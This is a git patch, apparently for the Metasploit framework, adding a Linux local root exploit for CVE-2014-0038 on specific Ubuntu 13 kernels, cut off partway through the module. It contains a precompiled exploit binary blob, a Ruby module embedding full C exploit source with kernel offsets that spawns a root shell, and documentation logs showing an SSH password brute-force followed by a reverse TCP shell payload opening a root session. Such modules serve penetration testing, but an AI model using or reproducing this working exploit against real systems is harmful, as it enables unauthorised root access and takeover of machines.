From 2dfebe586e9adee4aee004dbb33cdd638147a8e9 Mon Sep 17 00:00:00 2001
From: h00die <michaeltcyr@gmail.com>
Date: Sat, 8 Oct 2016 23:58:09 -0400
Subject: [PATCH] working cve-2014-0038

---
 data/exploits/CVE-2014-0038/recvmmsg          | Bin 0 -> 14571 bytes
 .../exploit/linux/local/recvmmsg_priv_esc.md  | 133 +++++++
 .../exploits/linux/local/recvmmsg_priv_esc.rb | 354 ++++++++++++++++++
 3 files changed, 487 insertions(+)
 create mode 100644 data/exploits/CVE-2014-0038/recvmmsg
 create mode 100644 documentation/modules/exploit/linux/local/recvmmsg_priv_esc.md
 create mode 100644 modules/exploits/linux/local/recvmmsg_priv_esc.rb

diff --git a/data/exploits/CVE-2014-0038/recvmmsg b/data/exploits/CVE-2014-0038/recvmmsg
new file mode 100644
index 0000000000000000000000000000000000000000..fbd9143ffb605593c008603c96392436f23342e2
GIT binary patch
literal 14571
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
BWa$6^

literal 0
HcmV?d00001

diff --git a/documentation/modules/exploit/linux/local/recvmmsg_priv_esc.md b/documentation/modules/exploit/linux/local/recvmmsg_priv_esc.md
new file mode 100644
index 0000000000..3508d02dcc
--- /dev/null
+++ b/documentation/modules/exploit/linux/local/recvmmsg_priv_esc.md
@@ -0,0 +1,133 @@
+## Creating A Testing Environment
+
+This module works against Ubuntu 13.04, and 13.10.  As of writing this, those releases are at EOL (end of life).  If you wish to install `gcc` or other command, you'll need to fix your `/etc/sources.list` to
+point to the correct repos.
+
+`sudo sed -i -re 's/([a-z]{2}\.)?archive.ubuntu.com|security.ubuntu.com/old-releases.ubuntu.com/g' /etc/apt/sources.list` [source](http://askubuntu.com/questions/91815/how-to-install-software-or-upgrade-from-an-old-unsupported-release)
+
+This module has been tested against:
+
+  1. Ubuntu 13.04 (default kernel) 3.8.0-19-generic
+
+This module should also work against:
+
+  1. Ubuntu 13.10 (default kernel) 3.11.0-12-generic
+  2. Ubuntu 13.10 3.11.0-15-generic
+
+More kernels could be added to this, just need the proper offsets.
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Exploit a box via whatever method
+  4. Do: `use exploit/linux/local/recvmmsg_priv_esc`
+  5. Do: `set session #`
+  6. Do: `set verbose true`
+  7. Do: `exploit`
+
+## Options
+
+  **COMPILE**
+
+  If we should attempt to compile live on the system, or drop a binary.  Default is `auto` which will compile if `gcc` is installed.
+
+  **WritableDir**
+
+  A folder we can write files to.  Defaults to /tmp
+
+## Scenarios
+
+### Ubuntu 13.04 (with default kernel: 3.8.0-19-generic)
+
+#### Initial Access
+
+    [*] Processing recvmmsg.rc for ERB directives.
+    resource (recvmmsg.rc)> use auxiliary/scanner/ssh/ssh_login
+    resource (recvmmsg.rc)> set rhosts 192.168.2.20
+    rhosts => 192.168.2.20
+    resource (recvmmsg.rc)> set username ubuntu
+    username => ubuntu
+    resource (recvmmsg.rc)> set password ubuntu
+    password => ubuntu
+    resource (recvmmsg.rc)> exploit
+    [*] SSH - Starting bruteforce
+    [+] SSH - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),111(lpadmin),112(sambashare) Linux ubuntu1304 3.8.0-19-generic #29-Ubuntu SMP Wed Apr 17 18:16:28 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux '
+    [!] No active DB -- Credential data will not be saved!
+    [*] Command shell session 1 opened (192.168.2.117:39613 -> 192.168.2.20:22) at 2016-10-08 23:19:48 -0400
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+
+#### Escalate
+
+    resource (recvmmsg.rc)> use exploit/linux/local/recvmmsg_priv_esc
+    resource (recvmmsg.rc)> set verbose true
+    verbose => true
+    resource (recvmmsg.rc)> set payload linux/x86/shell/reverse_tcp
+    payload => linux/x86/shell/reverse_tcp
+    resource (recvmmsg.rc)> set session 1
+    session => 1
+    resource (recvmmsg.rc)> set lhost 192.168.2.117
+    lhost => 192.168.2.117
+    resource (recvmmsg.rc)> exploit
+    [*] Started reverse TCP handler on 192.168.2.117:4444 
+    [+] Kernel 3.8.0.pre.19.pre.generic is exploitable
+    [+] gcc is installed
+    [*] Live compiling exploit on system
+    [+] Kernel 3.8.0.pre.19.pre.generic is exploitable
+    [*] Writing to /tmp/4bUIkbrG.c (5950 bytes)
+    [*] Max line length is 65537
+    [*] Writing 5950 bytes in 1 chunks of 20667 bytes (octal-encoded), using printf
+    [*] Compiling /tmp/4bUIkbrG.c
+    [*] Writing to /tmp/a0RwAacU (185 bytes)
+    [*] Max line length is 65537
+    [*] Writing 185 bytes in 1 chunks of 560 bytes (octal-encoded), using printf
+    [*] Exploiting... May take 17min.  Start time: 2016-10-08 23:20:00 -0400
+    [*] Sending stage (36 bytes) to 192.168.2.20
+    [*] Command shell session 2 opened (192.168.2.117:4444 -> 192.168.2.20:38465) at 2016-10-08 23:32:49 -0400
+    
+    id
+    uid=0(root) gid=0(root) groups=0(root)
+    uname -a
+    Linux ubuntu1304 3.8.0-19-generic #29-Ubuntu SMP Wed Apr 17 18:16:28 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
+
+### Using pre-compiled binaries on the same system
+
+    resource (recvmmsg.rc)> use exploit/linux/local/recvmmsg_priv_esc
+    resource (recvmmsg.rc)> set verbose true
+    verbose => true
+    resource (recvmmsg.rc)> set payload linux/x86/shell/reverse_tcp
+    payload => linux/x86/shell/reverse_tcp
+    resource (recvmmsg.rc)> set session 1
+    session => 1
+    resource (recvmmsg.rc)> set lhost 192.168.2.117
+    lhost => 192.168.2.117
+    resource (recvmmsg.rc)> exploit
+    [*] Started reverse TCP handler on 192.168.2.117:4444 
+    [+] Kernel 3.8.0.pre.19.pre.generic is exploitable
+    [-] gcc is not installed.  Compiling will fail.
+    [*] Dropping pre-compiled exploit on system
+    [+] Kernel 3.8.0.pre.19.pre.generic is exploitable
+    [*] Writing to /tmp/Yc0xB9oC (14571 bytes)
+    [*] Max line length is 65537
+    [*] Writing 14571 bytes in 1 chunks of 38575 bytes (octal-encoded), using printf
+    [*] Writing to /tmp/a0RwAacU (185 bytes)
+    [*] Max line length is 65537
+    [*] Writing 185 bytes in 1 chunks of 560 bytes (octal-encoded), using printf
+    [*] Exploiting... May take 17min.  Start time: 2016-10-08 23:42:01 -0400
+    [*] Sending stage (36 bytes) to 192.168.2.20
+    [*] Command shell session 2 opened (192.168.2.117:4444 -> 192.168.2.20:38465) at 2016-10-08 23:54:50 -0400
+    [+] Deleted /tmp/Yc0xB9oC
+    [+] Deleted /tmp/a0RwAacU
+    
+    2689016405
+    carERUCEUgdCZfvTyiWuBklsNMqcNhey
+    true
+    dPZDicgefmDeBvIpRYKaToiSQmHWQxBe
+    yGWMZKlCTQskKCZERIXNchDARUIzzBJn
+    FjFxyOSVHntGpawbQfSzIdRPsbeyOgSq
+    true
+    HFPuJArQoYvuxhkoWbAwvdDbNVUjSdUL
+    vMvWNASOZcfTmStOGnozdJzfTAUWJYzU
+    VQUKZqzBlQaQJmbtyQSSNudDtINToRhu
+    whoami
+    root
diff --git a/modules/exploits/linux/local/recvmmsg_priv_esc.rb b/modules/exploits/linux/local/recvmmsg_priv_esc.rb
new file mode 100644
index 0000000000..84416d0254
--- /dev/null
+++ b/modules/exploits/linux/local/recvmmsg_priv_esc.rb
@@ -0,0 +1,354 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require "msf/core"
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = GoodRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+        'Name'           => 'Linux Kernel 3.13.1 Recvmmsg Privilege Escalation',
+        'Description'    => %q{
+          This module attempts to exploit CVE-2014-0038, by sending a recvmmsg
+          system call with a crafted timeout pointer parameter to gain root.
+          This exploit has offsets for 3 Ubuntu 13 kernels built in:
+          3.8.0-19-generic (13.04 default)
+          3.11.0-12-generic (13.10 default)
+          3.11.0-15-generic (13.10)
+          This exploit may take up to 13 minutes to run due to a decrementing (1/sec)
+          pointer which starts at 0xff*3 (765 seconds)
+        },
+        'License'        => MSF_LICENSE,
+        'Author'         =>
+          [
+            'h00die <mike@shorebreaksecurity.com>',  # Module
+            'rebel'                         # Discovery
+          ],
+        'DisclosureDate' => 'Feb 2 2014',
+        'Platform'       => [ 'linux'],
+        'Arch'           => [ ARCH_X86, ARCH_X86_64 ],
+        'SessionTypes'   => [ 'shell', 'meterpreter' ],
+        'Targets'        =>
+          [
+            [ 'Auto', { } ]
+          ],
+        'DefaultTarget'  => 0,
+        'DefaultOptions' => { 'WfsDelay' => 780, 'PrependFork' => true, },
+        'References'     =>
+          [
+            [ 'EDB', '31347'],
+            [ 'EDB', '31346'],
+            [ 'CVE', '2014-0038'],
+            [ 'URL', 'https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1453900']
+          ]
+      ))
+    register_options(
+      [
+        OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]),
+        OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])
+      ], self.class)
+  end
+
+  def check
+    def kernel_vuln?()
+      os_id = cmd_exec('grep ^ID= /etc/os-release')
+      if os_id == 'ID=ubuntu'
+        kernel = Gem::Version.new(cmd_exec('/bin/uname -r'))
+        case kernel.release.to_s
+        when '3.11.0'
+          if kernel == Gem::Version.new('3.11.0-15-generic') || kernel == Gem::Version.new('3.11.0-12-generic')
+            vprint_good("Kernel #{kernel} is exploitable")
+            return true
+          else
+            print_error("Kernel #{kernel} is NOT vulnerable or NOT exploitable")
+            return false
+          end
+        when '3.8.0'
+          if kernel == Gem::Version.new('3.8.0-19-generic')
+            vprint_good("Kernel #{kernel} is exploitable")
+            return true
+          else
+            print_error("Kernel #{kernel} is NOT vulnerable or NOT exploitable")
+            return false
+          end
+        else
+          print_error("Non-vuln kernel #{kernel}")
+          return false
+        end
+      else
+        print_error("Unknown OS: #{os_id}")
+        return false
+      end
+    end
+
+    if kernel_vuln?()
+      return CheckCode::Appears
+    else
+      return CheckCode::Safe
+    end
+  end
+
+  def exploit
+
+    if check != CheckCode::Appears
+      fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
+    end
+
+
+    # direct copy of code from exploit-db.  I removed a lot of the comments in the title area just to cut down on size
+
+    recvmmsg = %q{
+      /*
+      *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
+      recvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y)
+      CVE-2014-0038 / x32 ABI with recvmmsg
+      by rebel @ irc.smashthestack.org
+      -----------------------------------
+      */
+
+      #define _GNU_SOURCE
+      #include <netinet/ip.h>
+      #include <stdio.h>
+      #include <stdlib.h>
+      #include <string.h>
+      #include <sys/socket.h>
+      #include <unistd.h>
+      #include <sys/syscall.h>
+      #include <sys/mman.h>
+      #include <sys/types.h>
+      #include <sys/stat.h>
+      #include <fcntl.h>
+      #include <sys/utsname.h>
+
+      #define __X32_SYSCALL_BIT 0x40000000
+      #undef __NR_recvmmsg
+      #define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
+      #define VLEN 1
+      #define BUFSIZE 200
+
+      int port;
+
+      struct offset {
+          char *kernel_version;
+          unsigned long dest; // net_sysctl_root + 96
+          unsigned long original_value; // net_ctl_permissions
+          unsigned long prepare_kernel_cred;
+          unsigned long commit_creds;
+      };
+
+      struct offset offsets[] = {
+          {"3.11.0-15-generic",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10
+          {"3.11.0-12-generic",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40}, // Ubuntu 13.10
+          {"3.8.0-19-generic",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04
+          {NULL,0,0,0,0}
+      };
+
+      void udp(int b) {
+          int sockfd;
+          struct sockaddr_in servaddr,cliaddr;
+          int s = 0xff+1;
+
+          if(fork() == 0) {
+              while(s > 0) {
+                  fprintf(stderr,"\rbyte %d / 3.. ~%d secs left    \b\b\b\b",b+1,3*0xff - b*0xff - (0xff+1-s));
+                  sleep(1);
+                  s--;
+                  fprintf(stderr,".");
+              }
+
+              sockfd = socket(AF_INET,SOCK_DGRAM,0);
+              bzero(&servaddr,sizeof(servaddr));
+              servaddr.sin_family = AF_INET;
+              servaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK);
+              servaddr.sin_port=htons(port);
+              sendto(sockfd,"1",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr));
+              exit(0);
+          }
+
+      }
+
+      void trigger() {
+          open("/proc/sys/net/core/somaxconn",O_RDONLY);
+
+          if(getuid() != 0) {
+              fprintf(stderr,"not root, ya blew it!\n");
+              exit(-1);
+          }
+
+          fprintf(stderr,"w00p w00p!\n");
+          system("/bin/sh -i");
+      }
+
+      typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
+      typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
+      _commit_creds commit_creds;
+      _prepare_kernel_cred prepare_kernel_cred;
+
+      // thx bliss
+      static int __attribute__((regparm(3)))
+      getroot(void *head, void * table)
+      {
+          commit_creds(prepare_kernel_cred(0));
+          return -1;
+      }
+
+      void __attribute__((regparm(3)))
+      trampoline()
+      {
+          asm("mov $getroot, %rax; call *%rax;");
+      }
+
+      int main(void)
+      {
+          int sockfd, retval, i;
+          struct sockaddr_in sa;
+          struct mmsghdr msgs[VLEN];
+          struct iovec iovecs[VLEN];
+          char buf[BUFSIZE];
+          long mmapped;
+          struct utsname u;
+          struct offset *off = NULL;
+
+          uname(&u);
+
+          for(i=0;offsets[i].kernel_version != NULL;i++) {
+              if(!strcmp(offsets[i].kernel_version,u.release)) {
+                  off = &offsets[i];
+                  break;
+              }
+          }
+
+          if(!off) {
+              fprintf(stderr,"no offsets for this kernel version..\n");
+              exit(-1);
+          }
+
+          mmapped = (off->original_value  & ~(sysconf(_SC_PAGE_SIZE) - 1));
+          mmapped &= 0x000000ffffffffff;
+
+              srand(time(NULL));
+          port = (rand() % 30000)+1500;
+
+          commit_creds = (_commit_creds)off->commit_creds;
+          prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred;
+
+          mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
+
+          if(mmapped == -1) {
+              perror("mmap()");
+              exit(-1);
+          }
+
+          memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3);
+
+          memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300);
+
+          if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) {
+              perror("mprotect()");
+              exit(-1);
+          }
+
+          sockfd = socket(AF_INET, SOCK_DGRAM, 0);
+          if (sockfd == -1) {
+              perror("socket()");
+              exit(-1);
+          }
+
+          sa.sin_family = AF_INET;
+          sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
+          sa.sin_port = htons(port);
+
+          if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
+              perror("bind()");
+              exit(-1);
+          }
+
+          memset(msgs, 0, sizeof(msgs));
+
+          iovecs[0].iov_base = &buf;
+          iovecs[0].iov_len = BUFSIZE;
+          msgs[0].msg_hdr.msg_iov = &iovecs[0];
+          msgs[0].msg_hdr.msg_iovlen = 1;
+
+          for(i=0;i < 3 ;i++) {
+              udp(i);
+              retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i);
+              if(!retval) {
+                  fprintf(stderr,"\nrecvmmsg() failed\n");
+              }
+          }
+
+          close(sockfd);
+          fprintf(stderr,"\n");
+          trigger();
+      }
+    }
+
+    filename = rand_text_alphanumeric(8)
+    executable_path = "#{datastore['WritableDir']}/#{filename}"
+    payloadname = rand_text_alphanumeric(8)
+    payload_path = "#{datastore['WritableDir']}/#{payloadname}"
+
+    def has_prereqs?()
+      gcc = cmd_exec('which gcc')
+      if gcc.include?('gcc')
+        vprint_good('gcc is installed')
+      else
+        print_error('gcc is not installed.  Compiling will fail.')
+      end
+      return gcc.include?('gcc')
+    end
+
+    compile = false
